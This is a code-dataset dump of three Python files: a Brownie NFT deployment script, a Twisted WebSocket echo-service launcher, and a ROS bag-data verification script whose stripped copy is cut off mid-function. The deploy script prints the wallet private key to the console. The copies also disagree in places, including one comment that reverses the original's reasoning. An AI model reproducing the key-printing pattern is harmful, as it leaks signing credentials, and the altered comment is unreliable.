2021-04-24T07:48:11.000Z
|
scripts/advanced_collectible/deploy_advanced.py
|
toiaa/nft-mix
|
c73d1f2612440490c33b04c8cbac0eb9a086c514
|
[
"MIT"
] | null | null | null |
scripts/advanced_collectible/deploy_advanced.py
|
toiaa/nft-mix
|
c73d1f2612440490c33b04c8cbac0eb9a086c514
|
[
"MIT"
] | 1
|
2021-07-14T17:18:37.000Z
|
2021-07-14T17:18:37.000Z
|
#!/usr/bin/python3
from brownie import AdvancedCollectible, accounts, network, config
from scripts.helpful_scripts import fund_advanced_collectible
def main():
print(config["wallets"]["from_key"])
dev = accounts.add(config["wallets"]["from_key"])
print(network.show_active())
# publish_source = True if os.getenv("ETHERSCAN_TOKEN") else False # Currently having an issue with this
publish_source = False
advanced_collectible = AdvancedCollectible.deploy(
config["networks"][network.show_active()]["vrf_coordinator"],
config["networks"][network.show_active()]["link_token"],
config["networks"][network.show_active()]["keyhash"],
{"from": dev},
publish_source=publish_source,
)
fund_advanced_collectible(advanced_collectible)
return advanced_collectible
| 39.52381
| 108
| 0.720482
|
from brownie import AdvancedCollectible, accounts, network, config
from scripts.helpful_scripts import fund_advanced_collectible
def main():
print(config["wallets"]["from_key"])
dev = accounts.add(config["wallets"]["from_key"])
print(network.show_active())
publish_source = False
advanced_collectible = AdvancedCollectible.deploy(
config["networks"][network.show_active()]["vrf_coordinator"],
config["networks"][network.show_active()]["link_token"],
config["networks"][network.show_active()]["keyhash"],
{"from": dev},
publish_source=publish_source,
)
fund_advanced_collectible(advanced_collectible)
return advanced_collectible
| true
| true
|
f707b8955010ddb9ca4a46873c7c4a917555830a
| 2,329
|
py
|
Python
|
examples/twisted/websocket/echo_service/echows/main.py
|
dimddev/AutobahnPython
|
75442d2d1d2d2a3248ca264e3d196db5fbad0f70
|
[
"MIT"
] | null | null | null |
examples/twisted/websocket/echo_service/echows/main.py
|
dimddev/AutobahnPython
|
75442d2d1d2d2a3248ca264e3d196db5fbad0f70
|
[
"MIT"
] | null | null | null |
examples/twisted/websocket/echo_service/echows/main.py
|
dimddev/AutobahnPython
|
75442d2d1d2d2a3248ca264e3d196db5fbad0f70
|
[
"MIT"
] | null | null | null |
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
import twisted
from twisted.python import log, usage
from twisted.application.service import MultiService
from echoservice import EchoService
class AppService(MultiService):
"""
Our application service hierarchy.
"""
def startService(self):
# create WebSocket echo service and make it a child of our app service
svc = EchoService(self.port, self.debug)
svc.setName("EchoService")
svc.setServiceParent(self)
MultiService.startService(self)
class Options(usage.Options):
optFlags = [['debug', 'd', 'Emit debug messages']]
optParameters = [["port", "p", 8080, "Listening port (for both Web and WebSocket) - default 8080."]]
def makeService(options):
"""
This will be called from twistd plugin system and we are supposed to
create and return our application service.
"""
# create application service and forward command line options ..
service = AppService()
service.port = int(options['port'])
service.debug = options['debug']
return service
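# Editor's sketch (hedged, not part of the original example): a twistd plugin
# shim of the kind that would expose this service via ``twistd echows``. The
# tap name, and the convention that such a shim lives under
# ``twisted/plugins/``, are illustrative assumptions.
from zope.interface import implementer
from twisted.plugin import IPlugin
from twisted.application.service import IServiceMaker
@implementer(IServiceMaker, IPlugin)
class EchoServiceMaker(object):
    tapname = "echows"
    description = "WebSocket echo service."
    options = Options
    def makeService(self, options):
        # delegate to the module-level makeService defined above
        return makeService(options)
serviceMaker = EchoServiceMaker()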
| 34.761194
| 104
| 0.681838
|
import twisted
from twisted.python import log, usage
from twisted.application.service import MultiService
from echoservice import EchoService
class AppService(MultiService):
def startService(self):
svc = EchoService(self.port, self.debug)
svc.setName("EchoService")
svc.setServiceParent(self)
MultiService.startService(self)
class Options(usage.Options):
optFlags = [['debug', 'd', 'Emit debug messages']]
optParameters = [["port", "p", 8080, "Listening port (for both Web and WebSocket) - default 8080."]]
def makeService(options):
service = AppService()
service.port = int(options['port'])
service.debug = options['debug']
return service
| true
| true
|
f707b8d2ea591e22da57beaa84d6d6571d614fea
| 27,318
|
py
|
Python
|
scripts/testing/verify_data.py
|
ROSMilitary/DDR_Data_Recorder
|
d491a8433f2e3ae1ed88eea5c6f13207ab55247f
|
[
"MIT"
] | 5
|
2020-10-21T18:06:33.000Z
|
2022-02-04T21:01:24.000Z
|
scripts/testing/verify_data.py
|
ROSMilitary/DDR_Data_Recorder
|
d491a8433f2e3ae1ed88eea5c6f13207ab55247f
|
[
"MIT"
] | null | null | null |
scripts/testing/verify_data.py
|
ROSMilitary/DDR_Data_Recorder
|
d491a8433f2e3ae1ed88eea5c6f13207ab55247f
|
[
"MIT"
] | 4
|
2021-03-27T00:33:11.000Z
|
2022-02-04T21:01:14.000Z
|
#!/usr/bin/env python3
#******************************************************************************
#
#"Distribution A: Approved for public release; distribution unlimited. OPSEC #4046"
#
#PROJECT: DDR
#
# PACKAGE :
# ORIGINAL AUTHOR :
# MODIFIED DATE :
# MODIFIED BY :
# REVISION :
#
# Copyright (c) 2020 DCS Corporation
#
# Unlimited Rights assigned to the U.S. Government
#
# This material may be reproduced by or for the U.S Government pursuant
# to the copyright license under the clause at DFARS 252.227-7013. This
# notice must appear in all copies of this file and its derivatives.
#******************************************************************************
#
#Copyright (c) 2019-2020 U.S. Federal Government (in countries where recognized)
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to use,
#copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
#Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
#MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
#DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
#ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
#DEALINGS IN THE SOFTWARE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import collections
import glob
import logging
import logging.handlers
import mmap
import os
import pprint
import re
import sys
import threading
import rosbag
import rospkg
from topic_bag_checker import TopicBagChecker
from topic_connection import TopicConnection
from verification_report import VerificationReport
# Instance of rospkg.RosPack to find ros packages
ROS_PACK = rospkg.RosPack()
PKG_DIR = ROS_PACK.get_path('ddr_data_recorder')
SCRIPTS_PATH = os.path.join(PKG_DIR, 'scripts')
sys.path.insert(1, SCRIPTS_PATH)
import util # pylint: disable=wrong-import-position
## @vars Stores program options
FLAGS = None
## @vars The list of topics not to verify
ILLEGAL_TOPICS = [
'/your/topic'
]
## @vars The list of topics which require a
# special message key comparison function
SPECIAL_TOPICS = [
'/your/topic'
]
# The main logger for the file
_LOGGER = None
# The lock for creating the logger
_LOGGER_LOCK = threading.Lock()
# Named tuple representing a key of a particular message
MessageKey = collections.namedtuple(
'MessageKey', ['seq', 'secs', 'nsecs'])
# Named tuple representing a key of /tf messages
TransformKey = collections.namedtuple(
'TransformKey', ['seq', 'secs', 'nsecs', 'child_frame_id'])
CURRENT_REPORT = None
## Add positional arguments to parser.
# Positional arguments are required and do not use a unique identifier to
# identify them, instead they are differentiated based on their position
# within the command.
# @param parser The ArgumentParser object to add the positional arguments to
# @returns None
def add_positional_arguments(parser):
parser.add_argument(
'directories',
metavar='directory',
nargs='+',
help='Directories of bag files to postprocess'
)
## Add optional arguments to parser.
# Optional arguments are not required and use a unique identifier to
# identify them.
# @param parser The ArgumentParser object to add the optional arguments to
# @returns None
def add_optional_arguments(parser):
parser.add_argument(
'-d', '--debug',
help=argparse.SUPPRESS,
action="store_const",
dest="log_level",
const=logging.DEBUG
)
parser.add_argument(
'-v', '--verbose',
help='Enables verbose mode',
action="store_const",
dest="log_level",
const=logging.INFO,
)
parser.add_argument(
'-t', '--tolerance',
type=int,
default=10,
metavar='T',
help='The tolerance to decide if a gap is missing data, ' \
'or a different publisher'
)
parser.add_argument(
'--log-name',
default='verify_data.log',
metavar='NAME',
help='The name of the log files'
)
parser.add_argument(
'--log-dir',
default=util.clean_directory_name('~/ddr_bags/verify_data_logs/'), # pylint: disable=no-member
metavar='DIR',
help='The directory to store the verify data log files in'
)
parser.add_argument(
'--num-logs',
type=int,
default=10,
metavar='NUM',
help='The number of log files to keep'
)
parser.add_argument(
'--log-size',
type=int,
default=1000000,
metavar='B',
help='The size of each log file in bytes ' \
'before generating a new log file'
)
parser.add_argument(
'--kml-path',
metavar='PATH',
help='The path to the kml file to use for verification'
)
parser.set_defaults(log_level=logging.WARNING)
## Parse all positional arguments and options.
# Parse the positional arguments and options specified into the global FLAGS
# variable and store unknown arguments into a new argv to pass to main.
# @param argv An argument vector to parse
# @returns A new argv for use in main
def parse_args(argv):
global FLAGS #pylint: disable=global-statement
# Argument parser from argparse
parser = argparse.ArgumentParser()
# Add all of the positional arguments
add_positional_arguments(parser)
# Add all of the optional arguments
add_optional_arguments(parser)
# Parse the arguments into FLAGS and argv
FLAGS, _argv = parser.parse_known_args(argv)
return _argv
## Get the main logger.
# Get the main logger or create a main logger if one does not exist
# @returns The main logger
def get_logger():
global _LOGGER #pylint: disable=global-statement
# Check if the logger has already been created
if not _LOGGER:
# Get a logger and name it
logger = logging.getLogger('main')
# Set the logging level for the current program
logger.setLevel(logging.DEBUG)
# Clean user input and make sure the directory exists
log_dir = util.clean_directory_name(FLAGS.log_dir) # pylint: disable=no-member
util.ensure_directory_exists(log_dir) # pylint: disable=no-member
# Clean user input and get just the name
if FLAGS.log_name.endswith('/'):
log_name = os.path.dirname(FLAGS.log_name)
else:
log_name = os.path.basename(FLAGS.log_name)
# Add the output handler.
_file_handler = logging.handlers.RotatingFileHandler(
os.path.join(log_dir, log_name),
maxBytes=FLAGS.log_size,
backupCount=FLAGS.num_logs
)
_file_handler.setFormatter(logging.Formatter(
fmt='%(asctime)s.%(msecs)03d %(message)s',
datefmt='%Y_%m_%d %H:%M:%S'
))
_file_handler.setLevel(logging.DEBUG)
logger.addHandler(_file_handler)
# Add the output handler.
_handler = logging.StreamHandler(sys.stdout)
_handler.setFormatter(logging.Formatter(fmt='%(message)s'))
_handler.setLevel(FLAGS.log_level)
logger.addHandler(_handler)
# Get a lock on the logger
with _LOGGER_LOCK:
# Set the global logger
_LOGGER = logger
return _LOGGER
## Determine if a message is valid
# Determine if a message is valid to be used for indexing
# in an old bag
# @param message The message to verify
# @returns Bool if message is valid for use in indexing in an old bag
def is_valid(value):
if value.topic not in ILLEGAL_TOPICS:
# Message must have a header field
# This is how to check for a header according
# to the ROS Cookbook and it's twice as fast
# as hasattr(value.message, 'header') so ¯\_(ツ)_/¯
if value.message._has_header: # pylint: disable=protected-access
return True
return False
## Get the key from a bag message
# Gets the unique key for a message from a bag
# @param bag_message The bag message to get the unique key for
# @returns collections.namedtuple MessageKey or TransformKey that represents
# the unique key value of the bag message
def get_message_key(bag_message):
logger = get_logger()
key = None
# Skip illegal topics
if bag_message.topic not in ILLEGAL_TOPICS:
# Handle /ddr/andBeyond topic
if bag_message.topic == '/ddr/andBeyond':
key = bag_message.message.data
# Handle /special topic
# use this template to create a handler for topics that have weird data vars
elif bag_message.topic == '/special':
transform = bag_message.message.transforms[0]
key = TransformKey(transform.header.seq,
transform.header.stamp.secs,
transform.header.stamp.nsecs,
transform.child_frame_id)
# ***********************************
elif is_valid(bag_message):
# Message key is a tuple of the sequence number and timestamp
# from the header of the message
key = MessageKey(bag_message.message.header.seq,
bag_message.message.header.stamp.secs,
bag_message.message.header.stamp.nsecs)
else:
logger.info('No handler for topic %s', bag_message.topic)
logger.debug('message: %s\n', bag_message.message)
return key
## Handle comparison of the special case /andBeyond topic
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns int The value of the comparison between current_key and key
def and_beyond_handler(current_key, key):
diff = current_key - key
if diff > 0:
return diff
return None
## Handle comparison of the special case /special topic
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns Bool The value of the comparison between current_key and key
def special_handler(current_key, key):
key_is_good = False
if current_key.secs - key.secs > 0:
key_is_good = True
elif current_key.secs - key.secs == 0:
if current_key.nsecs - key.nsecs > 0:
key_is_good = True
return key_is_good
## Compares keys of messages, calling the special case handlers if needed
# @param bag_message The message from the bag
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns int, Bool, or None The value of the comparison between
# current_key and key
def compare_keys(bag_message, current_key, key):
logger = get_logger()
# Skip illegal topics
if bag_message.topic in ILLEGAL_TOPICS:
logger.debug('Illegal topic: %s', bag_message.topic)
return None
ret_val = None
# Handle /ddr/andBeyond topic
if bag_message.topic == '/ddr/andBeyond':
ret_val = and_beyond_handler(current_key, key)
# Handle /special topic
elif bag_message.topic == '/special':
ret_val = special_handler(current_key, key)
elif is_valid(bag_message):
ret_val = current_key.seq - key.seq
return ret_val
## Handle the verification of any special case topics that require
# different key verification logic
# @param bag_message The message from the bag
# @param topic_connection The TopicConnection object containing topic keys
# and number of connections
# @param current_key The key of the current message to compare
def verify_special(bag_message, topic_connection, current_key):
logger = get_logger()
if bag_message.topic == '/special':
key = topic_connection.get_key(current_key.child_frame_id)
if key is not None:
if not tf_handler(current_key, key):
print('Topic {} may not line up.'.format(bag_message.topic))
logger.debug('current_key: %s\n' \
'key: %s',
current_key,
key)
logger.debug('verify_special topic_connection: %s, current_key: %s',
topic_connection, current_key)
topic_connection.set_key(current_key.child_frame_id, current_key)
## Handle the verification of all topics not requiring special case logic
# @param bag_message The message from the bag
# @param topic_connection The TopicConnection object containing topic keys
# and number of connections
# @param current_key The key of the current message to compare
def verify(bag_message, topic_connection, current_key):
logger = get_logger()
if bag_message.topic in SPECIAL_TOPICS:
verify_special(bag_message, topic_connection, current_key)
return
if len(topic_connection.keys) == 0:
topic_connection.add_key(current_key)
return
lowest_diff = None
index = -1
for i, key in enumerate(topic_connection.keys):
diff = compare_keys(bag_message, current_key, key)
if diff is not None:
if lowest_diff is None or diff < lowest_diff:
lowest_diff = diff
index = i
if lowest_diff is None:
logger.debug('lowest_diff is None.\n' \
'current_key: %s;\n' \
'topic_connection: %s',
current_key,
topic_connection)
return
if lowest_diff == 1:
topic_connection.set_key(index, current_key)
logger.debug('lowest_diff == 1.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff <= 0 and len(topic_connection.keys) < \
topic_connection.connections:
topic_connection.add_key(current_key)
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
logger.debug('lowest_diff <= 0 and len(topic_connection.keys) < ' \
'topic_connection.connections.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff > FLAGS.tolerance and len(topic_connection.keys) < \
topic_connection.connections:
topic_connection.add_key(current_key)
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
logger.debug('lowest_diff > FLAGS.tolerance and ' \
'len(topic_connection.keys) < ' \
'topic_connection.connections.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff <= FLAGS.tolerance:
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
print('Topic {} does not line up by {} messages'.format(
bag_message.topic, lowest_diff))
CURRENT_REPORT.add_bad_topic(bag_message.topic, lowest_diff)
logger.debug('current_key: %s\n' \
'key: %s',
current_key,
topic_connection.get_key(index))
topic_connection.set_key(index, current_key)
## Verify the contents of a single file
# @param file The path to the file to verify
# @param topic_connections All topic connections
def verify_file(file, topic_connections):
with rosbag.Bag(file, 'r') as bag:
bag_info = bag.get_type_and_topic_info()
topic_connections[file] = set(bag_info.topics.keys())
for topic, value in bag_info.topics.items():
if topic in ILLEGAL_TOPICS:
continue
topic_connection = topic_connections.get(topic)
if topic_connection:
topic_connection.connections = value.connections
else:
if topic in SPECIAL_TOPICS:
topic_connections[topic] = TopicConnection(
topic, value.connections, special_topic=True)
else:
topic_connections[topic] = TopicConnection(
topic, value.connections)
messages = bag.read_messages()
for bag_message in messages:
if bag_message.topic in ILLEGAL_TOPICS:
continue
current_key = get_message_key(bag_message)
verify(
bag_message,
topic_connections[bag_message.topic],
current_key
)
## Reset the keys for specific topics
# @param topic_connections All topic connections
# @param topics_to_clear The list of topics to clear the keys of
def reset_topics(topic_connections, topics_to_clear):
for topic in topics_to_clear:
topic_connection = topic_connections.get(topic)
if topic_connection is not None:
topic_connection.reset()
## Verify all the files in a directory
# @param files_list The list of file paths to verify
# @param tbc The TopicBagChecker to use for verification of bags
# and clearing of keys
def verify_files_in_directory(files_list, tbc):
logger = get_logger()
mode_pattern = r'^[a-zA-Z0-9_ -/()]*\d+_(?P<mode>.*)_\d+\.bag$'
topic_connections = {}
previous_mode = None
for file in files_list:
logger.info('Processing file %s', file)
if previous_mode is not None:
match = re.match(mode_pattern, file)
if match is not None:
current_mode = match.group('mode')
if current_mode != previous_mode:
topics_to_clear = tbc.process_bag(previous_mode,
current_mode)
reset_topics(topic_connections, topics_to_clear)
previous_mode = current_mode
else:
match = re.match(mode_pattern, file)
if match:
previous_mode = match.group('mode')
logger.debug('previous_mode: %s', previous_mode)
verify_file(file, topic_connections)
## Gets the path to the kml file
# Gets the path to the kml file using the --kml-path command line argument first.
# If no command line parameter is found or it is invalid, it looks for a kml
# file in the directory that is currently being processed. If there is still no
# kml file found, the final place checked is in the ddr_data_director package
# @param directory The current directory being verified
# @returns String The path to the kml file
def get_kml_paths(directory):
logger = get_logger()
kml_glob_pattern = '{}/*.xml'
# Check if the user specified a kml file
if FLAGS.kml_path:
if not FLAGS.kml_path.endswith('/'):
kml_path = os.path.expanduser(FLAGS.kml_path)
if os.path.isfile(kml_path):
if CURRENT_REPORT is not None:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.chosen_kml_name = os.path.basename(kml_path)
CURRENT_REPORT.kml_reason = \
'User specified a KML file for verification'
return [kml_path]
logger.info(
'"%s" is not a valid kml path. Attempting to find a kml in "%s"',
kml_path,
directory
)
# User did not specify a kml, attempt to find one in the current directory
kml_paths = glob.glob(kml_glob_pattern.format(directory))
if kml_paths:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.kml_reason = 'KML file was found in capture folder'
return kml_paths
# No kml in current directory, attempt to find one
# in the ddr_data_recorder ros package
ddr_dir = os.path.join(
SCRIPTS_PATH,
'dynamic_recording'
)
logger.info(
'No kml file in "%s". Attempting to find a kml in "%s"',
directory,
ddr_dir
)
kml_paths = glob.glob(kml_glob_pattern.format(ddr_dir))
if kml_paths:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.kml_reason = 'KML file was not found in capture ' \
'folder, but was found in the installation directory'
return kml_paths
logger.info('No kml files found.')
return []
## Gets the path to the markdown file
# Gets the path to the markdown file in the current directory. If multiple files
# exist, one is picked at random (due to how glob works).
# @param directory The current directory being verified
# @returns String The path to the markdown file
def get_markdown_paths(directory):
markdown_paths = glob.glob(os.path.join(directory, '*.md'))
if len(markdown_paths) == 1:
return markdown_paths[0]
if markdown_paths:
return markdown_paths
logger = get_logger()
logger.info('No markdown files found in "%s"', directory)
return []
## Gets the kml hash from the markdown file
# Looks through the markdown file and finds the line that contains the hash of
# the kml file used when it was created
# @param markdown_path The path to the markdown file to get the hash from
# @returns String The hash of the kml from the markdown
def get_markdown_hash(markdown_path):
logger = get_logger()
try:
with open(markdown_path, 'rb', 0) as _file, \
mmap.mmap(_file.fileno(), 0, access=mmap.ACCESS_READ) \
as markdown_file:
search_result = re.search(
br'## Hash of Used XML file \(md5\): (?P<hash>[0-9a-f]{32})',
markdown_file
)
if search_result:
markdown_hash = search_result.group('hash').decode('utf-8')
if CURRENT_REPORT is not None:
CURRENT_REPORT.markdown_hash_exists = True
CURRENT_REPORT.markdown_hash = markdown_hash
logger.info('Hash for kml found in "%s"', markdown_path)
return markdown_hash
except ValueError:
pass
logger.info('No hash for kml found in "%s"', markdown_path)
return ''
## Verifies that the hash of the kml file and the hash from the markdown file
# match
# @param kml_path The path to the kml file to verify
# @param markdown_path The path to the markdown file to verify the kml against
# @returns Bool True if the hashes match, False if they do not
def verify_kml_hash(kml_paths, markdown_paths):
logger = get_logger()
for markdown_path in markdown_paths:
markdown_kml_hash = get_markdown_hash(markdown_path)
if markdown_kml_hash:
logger.debug('markdown_kml_hash = %s', markdown_kml_hash)
if CURRENT_REPORT is not None:
CURRENT_REPORT.chosen_markdown_name = \
os.path.basename(markdown_path)
break
for kml_path in kml_paths:
current_kml_hash = util.generate_hash(kml_path) # pylint: disable=no-member
if not markdown_kml_hash:
CURRENT_REPORT.chosen_kml_name = util.get_path_with_parents( # pylint: disable=no-member
kml_path, 1)
CURRENT_REPORT.chosen_kml_hash = current_kml_hash
return False, kml_path
if current_kml_hash == markdown_kml_hash:
logger.debug('kml_hash = %s', current_kml_hash)
if CURRENT_REPORT is not None:
CURRENT_REPORT.chosen_kml_name = util.get_path_with_parents( # pylint: disable=no-member
kml_path, 1)
CURRENT_REPORT.chosen_kml_hash = current_kml_hash
return True, kml_path
return False, ''
def write_report():
if CURRENT_REPORT is not None:
with CURRENT_REPORT:
CURRENT_REPORT.write_header()
CURRENT_REPORT.write_settings(**vars(FLAGS))
CURRENT_REPORT.write_kml_section()
CURRENT_REPORT.write_files_verified()
CURRENT_REPORT.write_unverified_topics(ILLEGAL_TOPICS)
CURRENT_REPORT.write_bad_topics()
def main():
global CURRENT_REPORT # pylint: disable=global-statement
argv = [sys.argv[0]] + parse_args(sys.argv[1:])
logger = get_logger()
logger.debug('FLAGS=%s', FLAGS)
logger.debug('argv=%s', argv)
logger.info('Unable to verify the following topics:\n%s', pprint.pformat(
ILLEGAL_TOPICS))
logger.info('Topics requiring special handling:\n%s', pprint.pformat(
SPECIAL_TOPICS))
directories = map(os.path.expanduser, FLAGS.directories)
for directory in directories:
if os.path.isdir(directory):
logger.info('Processing directory "%s"', directory)
CURRENT_REPORT = VerificationReport(directory)
kml_paths = get_kml_paths(directory)
if not kml_paths:
print('Unable to verify "{}". No kml found.'.format(directory))
if CURRENT_REPORT is not None:
CURRENT_REPORT.kml_exists = False
write_report()
continue
markdown_paths = get_markdown_paths(directory)
if not markdown_paths:
print('Unable to verify "{}". No markdown ' \
'to compare kml hash against.'.format(directory))
else:
hash_verified, kml_path = verify_kml_hash(
kml_paths, markdown_paths)
if CURRENT_REPORT is not None:
CURRENT_REPORT.matching_hashes = hash_verified
if not hash_verified:
print('Unable to verify {}. KML and markdown ' \
'hashes do not match.'.format(directory))
tbc = TopicBagChecker(kml_path)
files_list = util.get_sorted_files_list(directory) # pylint: disable=no-member
if CURRENT_REPORT is not None:
CURRENT_REPORT.files_list = files_list
verify_files_in_directory(files_list, tbc)
else:
logger.info('"%s" is not a directory.', directory)
write_report()
if __name__ == '__main__':
main()
| 36.278884
| 104
| 0.646167
|
import argparse
import collections
import glob
import logging
import logging.handlers
import mmap
import os
import pprint
import re
import sys
import threading
import rosbag
import rospkg
from topic_bag_checker import TopicBagChecker
from topic_connection import TopicConnection
from verification_report import VerificationReport
ROS_PACK = rospkg.RosPack()
PKG_DIR = ROS_PACK.get_path('ddr_data_recorder')
SCRIPTS_PATH = os.path.join(PKG_DIR, 'scripts')
sys.path.insert(1, SCRIPTS_PATH)
import util
FLAGS = None
ILLEGAL_TOPICS = [
'/your/topic'
]
SPECIAL_TOPICS = [
'/your/topic'
]
_LOGGER = None
_LOGGER_LOCK = threading.Lock()
MessageKey = collections.namedtuple(
'MessageKey', ['seq', 'secs', 'nsecs'])
TransformKey = collections.namedtuple(
'TransformKey', ['seq', 'secs', 'nsecs', 'child_frame_id'])
CURRENT_REPORT = None
def add_positional_arguments(parser):
parser.add_argument(
'directories',
metavar='directory',
nargs='+',
help='Directories of bag files to postprocess'
)
def add_optional_arguments(parser):
parser.add_argument(
'-d', '--debug',
help=argparse.SUPPRESS,
action="store_const",
dest="log_level",
const=logging.DEBUG
)
parser.add_argument(
'-v', '--verbose',
help='Enables verbose mode',
action="store_const",
dest="log_level",
const=logging.INFO,
)
parser.add_argument(
'-t', '--tolerance',
type=int,
default=10,
metavar='T',
help='The tolerance to decide if a gap is missing data, ' \
'or a different publisher'
)
parser.add_argument(
'--log-name',
default='verify_data.log',
metavar='NAME',
help='The name of the log files'
)
parser.add_argument(
'--log-dir',
        default=util.clean_directory_name('~/ddr_bags/verify_data_logs/'),
        metavar='DIR',
help='The directory to store the verify data log files in'
)
parser.add_argument(
'--num-logs',
type=int,
default=10,
metavar='NUM',
help='The number of log files to keep'
)
parser.add_argument(
'--log-size',
type=int,
default=1000000,
metavar='B',
help='The size of each log file in bytes ' \
'before generating a new log file'
)
parser.add_argument(
'--kml-path',
metavar='PATH',
help='The path to the kml file to use for verification'
)
parser.set_defaults(log_level=logging.WARNING)
def parse_args(argv):
global FLAGS
parser = argparse.ArgumentParser()
add_positional_arguments(parser)
add_optional_arguments(parser)
FLAGS, _argv = parser.parse_known_args(argv)
return _argv
def get_logger():
global _LOGGER
if not _LOGGER:
logger = logging.getLogger('main')
logger.setLevel(logging.DEBUG)
        log_dir = util.clean_directory_name(FLAGS.log_dir)
        util.ensure_directory_exists(log_dir)
if FLAGS.log_name.endswith('/'):
log_name = os.path.dirname(FLAGS.log_name)
else:
log_name = os.path.basename(FLAGS.log_name)
_file_handler = logging.handlers.RotatingFileHandler(
os.path.join(log_dir, log_name),
maxBytes=FLAGS.log_size,
backupCount=FLAGS.num_logs
)
_file_handler.setFormatter(logging.Formatter(
fmt='%(asctime)s.%(msecs)03d %(message)s',
datefmt='%Y_%m_%d %H:%M:%S'
))
_file_handler.setLevel(logging.DEBUG)
logger.addHandler(_file_handler)
_handler = logging.StreamHandler(sys.stdout)
_handler.setFormatter(logging.Formatter(fmt='%(message)s'))
_handler.setLevel(FLAGS.log_level)
logger.addHandler(_handler)
with _LOGGER_LOCK:
_LOGGER = logger
return _LOGGER
def is_valid(value):
if value.topic not in ILLEGAL_TOPICS:
        # hasattr(value.message, 'header') is unreliable here, so fall back to
        # the protected _has_header flag  ¯\_(ツ)_/¯
if value.message._has_header: # pylint: disable=protected-access
return True
return False
## Get the key from a bag message
# Gets the unique key for a message from a bag
# @param bag_message The bag message to get the unique key for
# @returns collections.namedtuple MessageKey or TransformKey that represents
# the unique key value of the bag message
def get_message_key(bag_message):
logger = get_logger()
key = None
# Skip illegal topics
if bag_message.topic not in ILLEGAL_TOPICS:
# Handle /ddr/andBeyond topic
if bag_message.topic == '/ddr/andBeyond':
key = bag_message.message.data
# Handle /special topic
# use this template to create a handler for topics that have weird data vars
elif bag_message.topic == '/special':
transform = bag_message.message.transforms[0]
key = TransformKey(transform.header.seq,
transform.header.stamp.secs,
transform.header.stamp.nsecs,
transform.child_frame_id)
# ***********************************
elif is_valid(bag_message):
# Message key is a tuple of the sequence number and timestamp
# from the header of the message
key = MessageKey(bag_message.message.header.seq,
bag_message.message.header.stamp.secs,
bag_message.message.header.stamp.nsecs)
else:
logger.info('No handler for topic %s', bag_message.topic)
logger.debug('message: %s\n', bag_message.message)
return key
## Handle comparison of the special case /andBeyond topic
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns int The value of the comparison between current_key and key
def and_beyond_handler(current_key, key):
diff = current_key - key
if diff > 0:
return diff
return None
## Handle comparison of the special case /special topic
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns Bool The value of the comparison between current_key and key
def special_handler(current_key, key):
key_is_good = False
if current_key.secs - key.secs > 0:
key_is_good = True
elif current_key.secs - key.secs == 0:
if current_key.nsecs - key.nsecs > 0:
key_is_good = True
return key_is_good
## Compares keys of messages, calling the special case handlers if needed
# @param bag_message The message from the bag
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns int, Bool, or None The value of the comparison between
# current_key and key
def compare_keys(bag_message, current_key, key):
logger = get_logger()
# Skip illegal topics
if bag_message.topic in ILLEGAL_TOPICS:
logger.debug('Illegal topic: %s', bag_message.topic)
return None
ret_val = None
# Handle /ddr/andBeyond topic
if bag_message.topic == '/ddr/andBeyond':
